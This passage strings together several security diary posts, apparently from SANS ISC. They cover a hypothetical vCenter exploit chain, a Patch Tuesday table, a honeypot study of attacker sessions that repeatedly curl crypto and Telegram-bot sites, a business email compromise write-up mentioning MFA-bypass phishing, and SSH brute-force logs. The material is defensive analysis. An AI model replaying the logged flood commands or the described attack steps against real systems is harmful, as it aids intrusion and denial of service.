My theory is that the vulnerabilities hedge on the existence of Platform Services Controller (PSC) introduced in v7.0 of the vCenter server appliance [8].  With the introduction of the PSC as an integrated service, backend processes such as authentication, token management, and inter-component communication began relying heavily on the DCERPC protocol. In a hypothetical break-in using CVE-2024-38812/13, an attacker could target either /ui/authentication (authentication workflows) or /sdk (SOAP API requests) to exploit these vulnerabilities. By sending a specially crafted request to either endpoint, CVE-2024-38812 (Heap Overflow) could be triggered in DCERPC, granting unauthorized RCE within the PSC environment. Once initial access is achieved, the attacker could exploit CVE-2024-38813 (Memory Corruption) through escalated API calls to /sdk, allowing privilege escalation and persistence. This chain would enable complete compromise of the vSphere environment, leveraging PSC’s central role in v7.0+ systems. A game of hypotheticals.

Even though there is technically not a public POC, the concept of heap overflow for this activity is well documented by SonicWall’s Capture Labs Threat Research Team [3]. There have been some POCs for sale on GitHub since October.  While mere reconnaissance isn’t enough to single out vulnerability specific probing, it does give us some insight into the threat landscape.
Simply put, CVE-2024-38812 provides initial access via heap-overflow vulnerability in VMware vCenter Server that enables unauthenticated remote code execution. CVE-2024-38813, a privilege escalation flaw, allows attackers to expand their control and maintain persistence. Together, these vulnerabilities create a "vulnerability symbiosis”.

Conclusion

Interestingly, the source IPs were organizationally tied to the likes of DigitalOcean, OVH SAS, and NextGenWebs; DigitalOcean being a popular choice in the near past regarding Volt Typhoon [6]. I cannot say for certain that this is coincidence since it is somewhat popular for TAs. What is apparent is that attacker interest in mapping publicly accessible vSphere endpoints is steadily on the rise. While this is a relatively “new” disclosure, research into these vulnerabilities has also led me down the path of what-ifs. After all, the vulnerable versions were vCenter Server 7.0 (released April 2020), and vCenter Server 8.0 (released October 2022) ...only a 4.5-year-old vulnerability. In addition to that, as stated earlier, this unknown vulnerability duo was originally disclosed from Chinese security researchers in June 2024. In the game of nation states, then you know what that means [6].

What now?  Patch vCenter to the latest possible versions, await a working POC to document artifacts, hunt for suspicious behavior, and create new detections to match.  Just like Log4J, attackers will continue to find new ways to outmaneuver patching and detections.  Continue to monitor and defend.  Happy hunting.

References
[1] https://www.bleepingcomputer.com/news/security/critical-rce-bug-in-vmware-vcenter-server-now-exploited-in-attacks/
[2] https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
[3] https://www.sonicwall.com/blog/vmware-vcenter-server-cve-2024-38812-dcerpc-vulnerability
[4] https://www.bleepingcomputer.com/news/security/vmware-fixes-bad-patch-for-critical-vcenter-server-rce-flaw/
[5] https://www.securityweek.com/vmware-struggles-to-fix-flaw-exploited-at-chinese-hacking-contest/
[6] https://www.scworld.com/analysis/stats-say-chinese-researchers-are-not-deterred-by-chinas-vulnerability-law
[7] https://www.wired.com/story/china-vulnerability-disclosure-law/
[8] https://docs.vmware.com/en/VMware-vSphere/7.0/com.vmware.vsphere.vcenter.configuration.doc/GUID-135F2607-DA51-47A5-BB7A-56AD141113D4.html
[9] https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

Microsoft today released patches for 71 vulnerabilities. 16 of these vulnerabilities are considered critical. One vulnerability (CVE-2024-49138) has already been exploited, and details were made public before today's patch release.

Significant Vulnerabilities

CVE-2024-49138: This vulnerability affects the Windows Common Log File System Driver, a subsystem affected by similar privilege escalation vulnerabilities in the past. The only reason I consider this "significant" is that it is already being exploited.

Windows Remote Desktop Services: 9 of the 16 critical vulnerabilities affect Windows Remote Desktop Services. Exploitation may lead to remote code execution. Microsoft considers the exploitation of these vulnerabilities less likely. Even without considering these vulnerabilities, Windows Remote Desktop Service should not be exposed to the internet.

LDAP: Remote code execution vulnerabilities in the LDAP service are always "interesting" given the importance of LDAP as part of Active Directory. Two critical vulnerabilities are patched for LDAP. One with a CVSS score of 9.8. A third critical vulnerability affects the LDAP client.

CVE-2024-49126: LSASS vulnerabilities always make me reminisce of the "Blaster" worm and the related vulnerability back in the day. This one does involve a race condition, which will make exploitation more difficult. It could become an interesting lateral movement vulnerability if a reliable exploit materializes.

Description
CVE	Disclosed	Exploited	Exploitability (old versions)	current version	Severity	CVSS Base (AVG)	CVSS Temporal (AVG)
Input Method Editor (IME) Remote Code Execution Vulnerability
%%cve:2024-49079%%	No	No	-	-	Important	7.8	6.8
Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability
%%cve:2024-49124%%	No	No	-	-	Critical	8.1	7.1
Microsoft Access Remote Code Execution Vulnerability
%%cve:2024-49142%%	No	No	-	-	Important	7.8	6.8
Microsoft Defender for Endpoint on Android Spoofing Vulnerability
%%cve:2024-49057%%	No	No	-	-	Important	8.1	7.1
Microsoft Edge (Chromium-based) Spoofing Vulnerability
%%cve:2024-49041%%	No	No	Less Likely	Less Likely	Moderate	4.3	3.8
Microsoft Excel Remote Code Execution Vulnerability
%%cve:2024-49069%%	No	No	-	-	Important	7.8	6.8
Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability
%%cve:2024-49096%%	No	No	-	-	Important	7.5	6.5
Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
%%cve:2024-49122%%	No	No	-	-	Critical	8.1	7.1
%%cve:2024-49118%%	No	No	-	-	Critical	8.1	7.1
Microsoft Office Defense in Depth Update
ADV240002	No	No	-	-	Moderate
Microsoft Office Elevation of Privilege Vulnerability
%%cve:2024-49059%%	No	No	-	-	Important	7.0	6.1
%%cve:2024-43600%%	No	No	-	-	Important	7.8	6.8
Microsoft Office Remote Code Execution Vulnerability
%%cve:2024-49065%%	No	No	-	-	Important	5.5	4.8
Microsoft SharePoint Elevation of Privilege Vulnerability
%%cve:2024-49068%%	No	No	-	-	Important	8.2	7.1
Microsoft SharePoint Information Disclosure Vulnerability
%%cve:2024-49064%%	No	No	-	-	Important	6.5	5.7
%%cve:2024-49062%%	No	No	-	-	Important	6.5	5.7
Microsoft SharePoint Remote Code Execution Vulnerability
%%cve:2024-49070%%	No	No	-	-	Important	7.4	6.4
Microsoft/Muzic Remote Code Execution Vulnerability
%%cve:2024-49063%%	No	No	-	-	Important	8.4	7.3
System Center Operations Manager Elevation of Privilege Vulnerability
%%cve:2024-43594%%	No	No	-	-	Important	7.3	6.4
Windows Domain Name Service Remote Code Execution Vulnerability
%%cve:2024-49091%%	No	No	-	-	Important	7.2	6.3
Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
%%cve:2024-49114%%	No	No	-	-	Important	7.8	6.8
Windows Common Log File System Driver Elevation of Privilege Vulnerability
%%cve:2024-49088%%	No	No	-	-	Important	7.8	6.8
%%cve:2024-49090%%	No	No	-	-	Important	7.8	6.8
%%cve:2024-49138%%	Yes	Yes	-	-	Important	7.8	6.8
Windows File Explorer Information Disclosure Vulnerability
%%cve:2024-49082%%	No	No	-	-	Important	6.8	5.9
Windows Hyper-V Remote Code Execution Vulnerability
%%cve:2024-49117%%	No	No	-	-	Critical	8.8	7.7
Windows IP Routing Management Snapin Remote Code Execution Vulnerability
%%cve:2024-49080%%	No	No	-	-	Important	8.8	7.7
Windows Kernel Elevation of Privilege Vulnerability
%%cve:2024-49084%%	No	No	-	-	Important	7.0	6.1
Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
%%cve:2024-49074%%	No	No	-	-	Important	7.8	6.8
Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability
%%cve:2024-49121%%	No	No	-	-	Important	7.5	6.5
%%cve:2024-49113%%	No	No	-	-	Important	7.5	6.5
Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
%%cve:2024-49112%%	No	No	-	-	Critical	9.8	8.5
%%cve:2024-49127%%	No	No	-	-	Critical	8.1	7.1
Windows Local Security Authority Subsystem Service (LSASS) Remote Code Execution Vulnerability
%%cve:2024-49126%%	No	No	-	-	Critical	8.1	7.1
Windows Mobile Broadband Driver Elevation of Privilege Vulnerability
%%cve:2024-49073%%	No	No	-	-	Important	6.8	5.9
%%cve:2024-49092%%	No	No	-	-	Important	6.8	5.9
%%cve:2024-49077%%	No	No	-	-	Important	6.8	5.9
%%cve:2024-49078%%	No	No	-	-	Important	6.8	5.9
%%cve:2024-49083%%	No	No	-	-	Important	6.8	5.9
%%cve:2024-49110%%	No	No	-	-	Important	6.8	5.9
Windows Mobile Broadband Driver Information Disclosure Vulnerability
%%cve:2024-49087%%	No	No	-	-	Important	4.6	4.0
Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability
%%cve:2024-49097%%	No	No	-	-	Important	7.0	6.1
%%cve:2024-49095%%	No	No	-	-	Important	7.0	6.1
Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability
%%cve:2024-49129%%	No	No	-	-	Important	7.5	6.5
Windows Remote Desktop Services Remote Code Execution Vulnerability
%%cve:2024-49106%%	No	No	-	-	Critical	8.1	7.1
%%cve:2024-49108%%	No	No	-	-	Critical	8.1	7.1
%%cve:2024-49115%%	No	No	-	-	Critical	8.1	7.1
%%cve:2024-49119%%	No	No	-	-	Critical	8.1	7.1
%%cve:2024-49120%%	No	No	-	-	Critical	8.1	7.1
%%cve:2024-49123%%	No	No	-	-	Critical	8.1	7.1
%%cve:2024-49132%%	No	No	-	-	Critical	8.1	7.1
%%cve:2024-49116%%	No	No	-	-	Critical	8.1	7.1
%%cve:2024-49128%%	No	No	-	-	Critical	8.1	7.1
Windows Remote Desktop Services Denial of Service Vulnerability
%%cve:2024-49075%%	No	No	-	-	Important	7.5	6.5
Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability
%%cve:2024-49093%%	No	No	-	-	Important	8.8	7.7
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
%%cve:2024-49085%%	No	No	-	-	Important	8.8	7.7
%%cve:2024-49086%%	No	No	-	-	Important	8.8	7.7
%%cve:2024-49089%%	No	No	-	-	Important	7.2	6.3
%%cve:2024-49102%%	No	No	-	-	Important	8.8	7.7
%%cve:2024-49104%%	No	No	-	-	Important	8.8	7.7
%%cve:2024-49125%%	No	No	-	-	Important	8.8	7.7
Windows Task Scheduler Elevation of Privilege Vulnerability
%%cve:2024-49072%%	No	No	-	-	Important	7.8	6.8
Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability
%%cve:2024-49076%%	No	No	-	-	Important	7.8	6.8
Windows Wireless Wide Area Network Service (WwanSvc) Information Disclosure Vulnerability
%%cve:2024-49098%%	No	No	-	-	Important	4.3	3.8
%%cve:2024-49099%%	No	No	-	-	Important	4.3	3.8
%%cve:2024-49103%%	No	No	-	-	Important	4.3	3.8
Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability
%%cve:2024-49094%%	No	No	-	-	Important	6.6	5.8
%%cve:2024-49101%%	No	No	-	-	Important	6.6	5.8
%%cve:2024-49111%%	No	No	-	-	Important	6.6	5.8
%%cve:2024-49081%%	No	No	-	-	Important	6.6	5.8
%%cve:2024-49109%%	No	No	-	-	Important	6.6	5.8
WmsRepair Service Elevation of Privilege Vulnerability
%%cve:2024-49107%%	No	No	-	-	Important	7.3	6.4

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

I get a daily report from my honeypots for Cowrie activity [1], which includes telnet and SSH connection activity. One indicator I use to find sessions of interest is the number of commands run. Most of the time there are about 20 commands run per session, but a session with over 1,000 commands run in a session is unexpected.

Figure 1: Summary of Cowrie [2] attacks for the day, highlighting one with a large number of commands run.

 

The session was only attempting to curl the website for jvault[.]xyz, but did it a total of 1,344 times in about 180 seconds for an average of 7-8 requests every second.

Figure 2: Cowrie information for repeated curl request of hxxps://jvault[.]xyz.

Why do this? Well, it could be an indicator of an attempted DDoS attack if performing this kind of activity across a large number of systems. Was there something about this website that was of interest? It appears that the website is related to cyptocurrency. The main page mentions staking [3], DeFi [4], Launchpads [5] and DAO (Decentralized Autonomous Organization) [6].

 

Figure 3: Homepage screenshot of hxxps://jvault[.]xyz.

 

A couple of days since this initial finding, there were similar sessions that also tried to curl various websites. I used JQ with some raw logs on my honeypots to find similar activity.

# read cowrie JSON files
# cat /logs/cowrie.json*

# select any data from source IP 77.91.85.134
# jq 'select(.src_ip=="77.91.85.134")'

# select any data with the 'input' key present (commands run on honeypot)
# jq 'select(.input)'

# extract timestamp, source IP and command from logs returned
# jq '{timestamp, src_ip, input}'

# select elements of array and display in TSV (tab separated value) format
# jq -r '[.[]] | @tsv'

# sort alphabetically
# sort

# display first 10 items
# head

cat /logs/cowrie.json* | jq 'select(.src_ip=="77.91.85.134")' | jq 'select(.input)' \
| jq '{timestamp, src_ip, input}' | jq -r '[.[]] | @tsv' | sort | head

# output from GCP honeypot
2024-11-18T19:10:19.721578Z     77.91.85.134    curl -o /dev/null https://sambot[.]ru
2024-11-18T19:10:19.860960Z     77.91.85.134    curl -o /dev/null https://sambot[.]ru
2024-11-18T19:10:19.903455Z     77.91.85.134    curl -o /dev/null https://sambot[.]ru
2024-11-18T19:10:20.098534Z     77.91.85.134    curl -o /dev/null https://sambot[.]ru
2024-11-18T19:10:20.228898Z     77.91.85.134    curl -o /dev/null https://sambot[.]ru
2024-11-18T19:10:20.282748Z     77.91.85.134    curl -o /dev/null https://sambot[.]ru
2024-11-18T19:10:20.583350Z     77.91.85.134    curl -o /dev/null https://sambot[.]ru
2024-11-18T19:10:20.636637Z     77.91.85.134    curl -o /dev/null https://sambot[.]ru
2024-11-18T19:10:20.978894Z     77.91.85.134    curl -o /dev/null https://sambot[.]ru
2024-11-18T19:10:21.022589Z     77.91.85.134    curl -o /dev/null https://sambot[.]ru

# output from Azure honeypot
2024-11-21T15:29:18.127274Z     77.91.85.134    curl -o /dev/null https://jambler[.]io
2024-11-21T15:29:18.282875Z     77.91.85.134    curl -o /dev/null https://jambler[.]io
2024-11-21T15:29:18.499913Z     77.91.85.134    curl -o /dev/null https://jambler[.]io
2024-11-21T15:29:18.744135Z     77.91.85.134    curl -o /dev/null https://jambler[.]io
2024-11-21T15:29:18.894551Z     77.91.85.134    curl -o /dev/null https://jambler[.]io
2024-11-21T15:29:19.257191Z     77.91.85.134    curl -o /dev/null https://jambler[.]io
2024-11-21T15:29:19.404682Z     77.91.85.134    curl -o /dev/null https://jambler[.]io
2024-11-21T15:29:19.900103Z     77.91.85.134    curl -o /dev/null https://jambler[.]io
2024-11-21T15:29:20.171343Z     77.91.85.134    curl -o /dev/null https://jambler[.]io
2024-11-21T15:29:20.594296Z     77.91.85.134    curl -o /dev/null https://jambler[.]io


# read cowrie JSON files
# cat /logs/cowrie.json*

# select any data from source IP 77.91.85.134
# jq 'select(.src_ip=="77.91.85.134")'

# select any data with the 'input' key present (commands run on honeypot)
# jq 'select(.input)'

# extract timestamp, source IP and command from logs returned
# jq '{timestamp, src_ip, input}'

# select elements of array and display in TSV (tab separated value) format
# jq -r '[.[]] | @tsv'

# get third value per line (command in this case)
# cut -f 3

# sort alphabetically
# sort

# give counts per command found
# uniq -c

# sort results by count, ascending
# sort -n

cat /logs/cowrie.json* | jq 'select(.src_ip=="77.91.85.134")' | jq 'select(.input)' \
| jq '{timestamp, src_ip, input}' | jq -r '[.[]] | @tsv' | cut -f 3 | sort | uniq -c \
| sort -n

#output from GCP honeypot
      1 curl -s -A "myuser" https://eth0[.]me
     79 curl -o /dev/null https://token-mining[.]org:443
   1035 curl -o /dev/null https://exchange-pool[.]com/
   1201 curl -o /dev/null http://193.222.99[.]121
   1244 curl -o /dev/null https://botman[.]pro
   1348 curl -o /dev/null https://umbrella[.]day/
   1452 curl -o /dev/null https://niolic[.]com
   1506 curl -o /dev/null https://steam-up[.]ru
   1594 curl -o /dev/null http://stk-ms[.]ru
   1764 curl -o /dev/null http://85.217.171[.]107:443
   1773 curl -o /dev/null https://bottap[.]ru/
   1867 curl -o /dev/null https://sambot[.]ru
   2282 curl -o /dev/null https://santasol[.]fun/
   2361 curl -o /dev/null https://static.tgcube[.]store/
   3296 curl -o /dev/null https://baboon-tg-web-app-v2.onrender[.]com
   4314 curl -o /dev/null https://mystars-hk.syllix[.]io
   4633 curl -o /dev/null https://btcbot[.]cc
   5699 curl -o /dev/null https://www.gogetsms[.]com/
   6179 curl -o /dev/null https://tgmaster[.]xyz


#output from Azure honeypot
    638 curl -o /dev/null https://freeapi.bot-t[.]com/
   1375 curl -o /dev/null https://jambler[.]io
   1626 curl -o /dev/null https://duda.com[.]ua/
   3876 curl -o /dev/null https://app.tbiz[.]pro
   4195 curl -o /dev/null https://www.gift-bnb[.]org/
   7759 curl -o /dev/null https://jvault[.]xyz/
  15743 curl -o /dev/null https://tgmaster[.]xyz

 

There were many other sessions with similar activity, using curl repeatedly for a website, all coming from the same source IP of %%ip:77.91.85.134%%. There were also many more websites than expected. Since I regularly backup and prune my local honeypot logs, I went to my DShield-SIEM [7] instance to build a dashboard to try and get some additional information.

Figure 4: Results for commands run during Cowrie sessions from %%ip:77.91.85.134%%.

 

Figure 5: Comparison of command volume and honeypot volume, highlighting one curl command that was running from two honeypots in the same timeframe.

 

An interesting item is activity for one website happening at the same time between two honeypots.

 

Figure 6: Activity from two honeypots asked to execute a curl command for tgmaster[.]xyz within a 3-4 hour timeframe.

 

The data was exporrted from the dashboard and the websites were manually reviewed to try and identify a general purpose. In many cases the websites were in Russian and Google Translate [8] was used to read the information. In a couple instances, the websites were also restricted by location, so a VPN was used to access the content from a Russian geolocated IP address.

 

Total Honeypot Requests	Site	Manual Review	GeoIP Restricted
134,326	https://tgmaster[.]xyz	Telegram Bot Construction	No
46,290	https://btcbot[.]cc	Sales Bots / Telegram	No
21,570	https://mystars-hk[.]syllix[.]io	MyStars Telegram Bot	Yes
20,359	https://jvault[.]xyz/	Cryptocurrency / JetTon Staking	No
17,538	https://www[.]gogetsms[.]com/	SMS / Temporary Numbers	No
16,480	https://baboon-tg-web-app-v2[.]onrender[.]com	Telegram Bots / Crytocurrency	No
15,940	http://stk-ms[.]ru	Building Construction Design	No
14,936	https://sambot[.]ru	Telegram Bot Construction	No
14,184	https://bottap[.]ru/	Designer Chatbots	No
14,112	http://85[.]217[.]171[.]107:443	"NeoVPN" (keys[.]neovpn[.]online) / Mention of bots to add money, may be cryptocurrentcy related	No
12,585	https://www[.]gift-bnb[.]org/	BBAPool / Cryptocurrency Bots	No
12,048	https://steam-up[.]ru	Steam Balance Replenishment	No
11,805	https://static[.]tgcube[.]store/	MARKETSSUPER	No
11,628	https://app[.]tbiz[.]pro	Trading Bots	Yes
11,410	https://santasol[.]fun/	Mobile Game	No
11,000	https://jambler[.]io	Cryptocurrency / Bitcoin mixing	No
10,784	https://umbrella[.]day/	Website and Bot Creation	No
9,952	https://botman[.]pro	Chatbot Creation	No
9,608	http://193[.]222[.]99[.]121	Token Mining (token-mining[.]org) / MNG LAB	No
8,280	https://exchange-pool[.]com/	Cryptocurrency Exchange	No
7,260	https://niolic[.]com	Cryptocurrency / Investments	No
5,104	https://freeapi[.]bot-t[.]com/	Telegram Bots	No
632	https://token-mining[.]org:443	Token Mining (token-mining[.]org) / MNG LAB	No
6	https://eth0[.]me	Uknown (returns visitor IP address)	No

Figure 6: Webites from curl commands, number of times accessed and website purpose from manual review.

There is a general theme to the websites, including:

• Bot construction
• Communication platforms
• Cryptocurrency

Since collecting the original data, a couple new sites have been seen being accessed in a similar way:

• https://duda[.]com[.]ua/ - smoking-related sales website
• https://178.159.43[.]149 - cerficate for express12[.]com domain, which redirects to https://t[.]me/durov (provides link to view "Thoughts from the CEO of Telegram" in Telegram)

From my collection of honeypots, these curl commands have only been seen originating from %%ip:77.91.85.134%% and the commands start with "curl -o /dev/null". The activity started on November 18, 2024 and new activity is still being seen.

 

[1] https://github.com/jslagrew/cowrieprocessor
[2] https://github.com/cowrie/cowrie
[3] https://www.coinbase.com/learn/crypto-basics/what-is-staking
[4] https://www.coinbase.com/learn/crypto-basics/what-is-defi
[5] https://cointelegraph.com/news/what-is-a-crypto-launchpad-and-how-does-it-work
[6] https://www.investopedia.com/tech/what-dao/
[7] https://github.com/bruneaug/DShield-SIEM
[8] https://translate.google.com/?sl=auto&tl=en&op=translate

 

--
Jesse La Grew
Handler

[This is a Guest Diary by Chris Kobee, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].

Business Email Compromise (BEC) is a lucrative attack, which FBI data shows 51 billion dollars in losses between 2013 to 2022 [2]. According to SentinelOne, nearly all cybersecurity attacks (98%) contain a social engineering component [3].The social engineering attacks include phishing, spear phishing, smishing, whaling , etc.  Figure 1 is a distribution of social engineering attacks from Statista depicting Scamming, Phishing, and BEC attacks worldwide [4]. Scamming is the leader, followed by Phishing and BEC [5]. BEC and other social engineering attacks are the path of least resistance with a high rate of success versus attempting technical network intrusions.

In May 2024, a significant cybersecurity incident unfolded within an organization, showcasing the vulnerabilities that can arise from BEC harvesting user credentials and the exploitation of cloud services like Microsoft 365  . This post aims to break down the events, identify the vulnerabilities exploited, and review implemented and proposed mitigations to thwart similar threats.
 

Figure 1: Distribution of Worldwide Social Engineering Attacks

Organization Incident Overview

From May 20 to 23, 2024, a threat actor successfully accessed a Microsoft 365 account belonging to a user in the organization’s accounting department with the user’s valid credentials. The actor manipulated account details in a pending invoice and redirected funds to their own bank account. The incident was characterized by several key actions  beginning on May 20 when the actor successfully logged into the Microsoft 365 account after a rejection pattern of an expired session ID and MFA denials. 

The actor conducted reconnaissance on May 22, potentially identifying the pending vendor invoices for payment. The attacker logged into the user’s email account on May 23rd and created a new inbox rule to direct any correspondence with the vendor organization’s name to the RSS Feeds folder in the inbox. The actor altered the target document and sent it to the next stage in the approval process. The accounting department’s processes broke down and did not catch spelling and grammar errors that could have tipped off potential fraud. The document was approved, the ACH payment was authorized, and payment was completed. The organization’s Managed Service Provider/Managed Security Service Provider (MSP/MSSP) receive an alert and re-secured the account later in the early evening, effectively locking out the actor. Figures 2 and 3 display a high-level summary of the events and timeline. 

Figure 2: Business Email Compromise Attack Timeline

 

Figure 3: Threat Actor Login Attempts

Initial Access

The  attacker logged into the organization's M365 tenant using compromised credentials on May 20, 2024, and re-entered the system on May 22 for reconnaissance. The actor appears to have conducted reconnaissance on May 22 for approximately thirty-four minutes, during which the pending invoice was potentially discovered.

Fraud Executed

On May 23, the attacker logged into the email exchange and executed bank fraud by altering the invoice's destination bank account. They also implemented new inbox rules  (Figure 4) within the Outlook account to obscure their activities by redirecting any email traffic with the vendor’s name to an obscure folder. The newly created inbox rules, one rule for each organizational name the vendor employs, directed any incoming communications to the RSS Feeds folder for obscurity from the authorized account user. The target vendor was purchased by another company and sends correspondence from both companies, which the attacker covered with both rules. The attacker sent the fraudulent invoice to the next accounting staff member for further processing. 

Figure 4: Threat Actor Action on Objective

 

Covered Tracks 

The threat actor attempted to cover their actions by deleting items and folders created while in the organization’s cloud account (Figure 5),  withdrew the funds shortly after the transfer, and closed the bank account. The organization reached out to the actor’s financial institution to reverse the payment, but the financial institution rejected the request to reverse the payment due to the account closure.

Figure 5: Threat Actor’s Covering Tracks Attempt

Detection 

The organization's MSP/MSSP detected an unusual inbox rule change and resecured the compromised account (Figure 6), but not before the attacker could execute their plan. 

Figure 6: Threat Actor Activity Detected by MSP/MSSP

 

Analysis 

Analysis of the logs, provided by the Cloud Service Provider, suggests MFA was bypassed and potential collusion or manipulation of the organization’s assigned user. Further research revealed a CVE written against the Microsoft Authenticator application employed by the organization on company issue and BYOD mobile devices.

Multi-Factor Authentication (MFA)

MFA was enabled during the attack, with logs indicating the attacker faced several denied attempts before successfully logging in. This suggests potential insider collusion, manipulation of the authorized user, and/or an Attacker-in-the-Middle tool, such as evilginx2 [5] or later version used for to phish user credentials, session cookies, and bypass MFA. Figure 7 depicts the pattern of a failed login with an expired session ID, followed by three failed logins due to MFA denials, and a successful login on May 20th and 22nd [6]. 
 

Figure 7: Threat Actor Login Attempt Pattern

 

Vulnerability in Microsoft Authenticator

The incident points to a specific vulnerability (CVE-2024-21390) in the Microsoft Authenticator application (Figure 5), which can be exploited if an attacker gains access to the user's local device and convinces the user to relaunch the authenticator app [7][8]. The threat actor potentially compromised the user’s mobile device through malware delivered via phishing or smishing vector allowing the opportunity to manipulate the user to close and re-launch the application on the mobile device.
 

Figure 8: Microsoft Authenticator Vulnerability

 

Conclusion, Mitigations, Lessons Learned

Business Email Compromise was the main factor in this attack as the threat actor used it as the attack vector and sent emails between the accounting department from the compromised user’s account to commit bank fraud. The attacker most likely obtained the user’s credentials through a phishing email tricking the user into clicking a link and inputting credentials on a web page highly resembling a Microsoft login page. Due to the nature of the Cloud Service Provider (CSP) / Cloud Customer Software as a Service (SaaS) model employed by organization, limited logging and insights are available, as the CSP manages the lower network layers. Analysis of the provided logs suggests that MFA was enabled and operational before, during, and after the incident. The pattern of MFA rejections with the error code long description defined by Microsoft as "Strong authentication is required and the user did not pass the MFA challenge" indicates potential insider collusion (witting or unwitting) to authenticate the attacker, but the rapid succession of MFA denials before the successful login is evidence of an automated attack, such as evilginx2 interacting with the MFA server.

After a thorough review, the organization found gaps in log auditing by the organization and the MSP/MSSP, as well as process gaps in the affected department. MFA and password complexity were in place, but appear to have been bypassed. The MSP/MSSP alerting process operated successfully, allowing the account to be re-secured quickly to prevent further lateral movement, privilege escalation, or establishment of a C2 channel. The following Information Security mitigations were adopted to address the gaps:

• All corporate personnel involved in accounting related duties were issued digital signature tokens from an external certification authority to enforce non-repudiation. Digitally signed emails provide recipients in the accounting department with validation the sender is the authorized user.
• Internal IT/Cybersecurity personnel audit authentication logs provided by MSP/MSSP monthly.
• Organization confirmed log retention of one year.
• Confirmed through MSP/MSSP the Microsoft Authenticator application is the current patched version.
• Developing a corporate phishing simulation program based on the Gophish open-source framework with custom python automation scripts.
• Increasing the frequency of phishing email and social engineering bulletins and awareness training.

Lessons Learned:

• Technical: Ensure authentication applications are patched and updated.
• Training and Awareness: Increase organizational awareness of malicious phishing and smishing attempts.
• Policy: Ensure data and document flow policies are understood and followed.
• Policy/Compliance: Continue to improve Cybersecurity posture by working closer with the MSP/MSSP to ensure controls and policies are clear, updated, and enforced.

Organizations can apply the lessons learned in this post to avoid the financial losses and compliance reporting requirements this target organization suffered. Training and awareness coupled with continuous improvement in Cybersecurity posture will harden the organizations users and systems against social engineering and technical network attacks and intrusions.

 

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://abnormalsecurity.com/blog/fbi-bec-51-billion-threat
[3] https://www.sentinelone.com/cybersecurity-101/cybersecurity/cyber-security-statistics/#:~:text=Almost%20all%20(98%25)%20cyberattacks,individuals%20into%20divulging%20sensitive%20information
[4] https://www.statista.com/statistics/1493497/globla-social-engineering-attack-by-type/
[5] https://www.kali.org/tools/evilginx2/
[6] https://learn.microsoft.com/en-us/entra/identity-platform/reference-error-codes
[7] https://nvd.nist.gov/vuln/detail/CVE-2024-21390
[8] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21390

 

 

--
Jesse La Grew
Handler

[This is a Guest Diary by Robert Cao, an ISC intern as part of the SANS.edu BACS program]

As a cybersecurity professional, I've always prided myself on my technical skills—understanding protocols, setting up secure systems, and knowing the ins and outs of firewalls and authentication mechanisms. But a recent deep dive into firewall and SSH logs taught me a lesson I wasn’t expecting: being technically savvy is only part of the equation. True success in cybersecurity also hinges on being an effective data analyst.

When I began examining the logs, I expected to find the usual culprits—brute force attempts, unusual traffic patterns, and the occasional misconfiguration. What I didn’t expect was how the data itself would tell a story far more valuable than any single technical fix. For instance, a repetitive pattern in the SSH logs from IP 137.184.185.209 showcased over 30 login attempts using common credentials like rootpaired with passwords such as Qaz@123456. At first glance, it seemed like just another brute force attempt. However, when I correlated this with firewall data, the same IP surfaced as repeatedly probing port 2222, a non-standard SSH port. Suddenly, it became clear: the actor wasn’t just relying on brute force; they were systematically targeting configurations presumed to be "secure by obscurity."

This realization made me question my own assumptions. In the past, I might have simply blocked the IP and moved on, feeling satisfied that I had applied a technical fix. But digging deeper into the data revealed patterns that informed broader strategies. Why was port 2222 being targeted? Could it be part of a larger campaign? These questions led to a more proactive approach: not just reacting to the attack, but trying to anticipate the next one.

Another revelation came from looking at overlapping datasets. By comparing SSH logs with firewall activity, I found four IPs—including 47.236.168.148 and 54.218.26.129—engaged in both brute force attempts and network probes. These actors were persistent, attempting to exploit systems over a short but intense window of time. Without correlating these datasets, I might have missed the coordinated nature of the attack entirely. This experience drove home the importance of cross-referencing data sources to uncover insights that no single log file could reveal.

Perhaps the most humbling realization was understanding that even advanced technical setups are only as good as the decisions behind them. Configurations that allowed root logins or didn’t enforce rate-limiting created vulnerabilities actors could exploit. As I analyzed the logs, I saw not just the actors' actions but also the blind spots in my own system's defenses. Technical knowledge helped me secure the systems, but it was the data analysis that highlighted the gaps.

This experience shifted my mindset. Cybersecurity isn't just about firewalls, encryption, and protocols—it's about understanding the data these systems generate. Data analysis is what transforms raw logs into actionable intelligence. It’s what turns a technically skilled professional into a strategist capable of predicting, preventing, and responding to threats effectively.

If there’s one thing I’ve learned, it’s that cybersecurity professionals must wear at least two hats: the technical expert and the data analyst. Technical skills build the foundation, but it’s the analysis of data that sharpens defenses and enables proactive security. As threats evolve and actors become more sophisticated, so too must our approach. Data is the key, and learning to harness its power is just as important as mastering the latest technical tools.

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

I found a sample that is a Word document with an embedded executable. I'll explain how to extract the embedded executable with my tools.

First I check with file-magic.py:

The identification says Word 2007+, so this is an OOXML document. These are ZIP containers that can be analyzed with zipdump.py to take a look inside:

Stream 6 (oleObject1.bin) is an OLE object that embeds the executable. There's no need to extract that OLE file from the OOXML container, oledump.py can handle this:

